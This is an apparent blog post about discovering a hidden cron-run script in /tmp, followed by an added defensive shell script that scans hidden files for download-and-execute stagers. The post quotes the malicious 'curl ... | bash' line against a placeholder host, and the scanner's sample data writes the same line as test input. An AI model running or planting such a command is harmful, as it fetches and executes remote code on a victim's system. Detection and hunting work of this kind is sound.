How I Caught a Suspicious Shell Script Running in /tmp (And What It Taught Me)
Intro:
Not all attacks are loud. Some just hide in quiet corners of your filesystem — like /tmp. I once found a tiny shell script there doing something it shouldn't. No alerts were triggered. No services crashed. But it could have become a serious problem if I hadn’t checked when I did. Here’s how I found it, what it was doing, and how you can avoid making the same mistake.
What I Saw:
While checking disk usage, I noticed this:
du -sh /tmp/*
One folder in /tmp was ~80MB — more than usual. Inside, I found this:
/tmp/.cache/.xsh
When I opened it:
cat /tmp/.cache/.xsh
I saw:
#!/bin/bash
curl http://malicious-domain.com/payload.sh | bash
The script fetched and executed a remote payload every 6 hours, run by a background cron job that had been installed under a non-root service user.
What I Learned:
✅ 1. Never Ignore Hidden Files in /tmp
Run:
find /tmp -type f -name ".*"
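To turn that one-off check into something repeatable, here is an added example (my own script, not code from the original post) that lists hidden files under a directory and flags any that pipe a curl or wget download straight into a shell, the pattern seen in .xsh. The function names and the sample files it builds under a temporary directory are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: hunt hidden files under a directory and flag the
# ones that download-and-execute (curl/wget piped into sh or bash).
# Assumes POSIX sh with find, grep and mktemp available.

# Return 0 if the file contains "curl ... | bash" / "wget ... | sh".
# The trailing space-or-end guard keeps "| sha256sum" from matching.
is_pipe_to_shell() {
  grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$1"
}

# Print every hidden regular file under $1 whose contents look like a
# download-and-execute stager. Nested hidden dirs (e.g. .cache) count.
scan_hidden() {
  find "$1" -type f -name '.*' 2>/dev/null | while IFS= read -r f; do
    if is_pipe_to_shell "$f"; then
      printf '%s\n' "$f"
    fi
  done
}

# Build a constructed sample tree (NOT a real finding) so the scanner
# can be exercised offline; prints the temp directory path.
make_sample() {
  sample_dir=$(mktemp -d) || return 1
  mkdir -p "$sample_dir/.cache"
  # Mirrors the stager from the post, using the post's placeholder host.
  printf '#!/bin/bash\ncurl http://malicious-domain.com/payload.sh | bash\n' \
    > "$sample_dir/.cache/.xsh"
  # A hidden script that merely downloads to a file: must NOT be flagged.
  printf 'curl -sS -o /tmp/report.json http://example.invalid/report\n' \
    > "$sample_dir/.cache/.ok"
  # An inert hidden file, typical of legitimate lock/cache files.
  printf 'lock\n' > "$sample_dir/.lock"
  printf '%s\n' "$sample_dir"
}

# Stand-alone use: scan_tmp_hunt.sh /tmp  (any directory works).
if [ $# -gt 0 ]; then
  scan_hidden "$1"
fi
```

Pair the scan with a look at the crontabs of service accounts, since the stager in the post was being re-run by cron rather than by anything that lived in /tmp.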